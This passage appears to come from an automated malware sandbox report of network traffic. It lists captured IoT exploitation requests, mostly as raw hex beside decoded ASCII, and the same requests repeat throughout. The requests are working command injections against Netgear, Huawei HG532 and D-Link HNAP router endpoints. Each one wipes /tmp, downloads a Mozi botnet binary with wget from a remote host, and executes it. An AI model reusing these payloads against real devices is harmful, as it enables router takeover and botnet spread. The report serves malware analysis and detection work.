6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 17.222.184.219:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 216.25.147.56:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 43.33.231.8:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 131.156.129.186:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 16.226.189.211:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 80.10.227.165:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 125.25.119.247:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 67.83.201.193:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 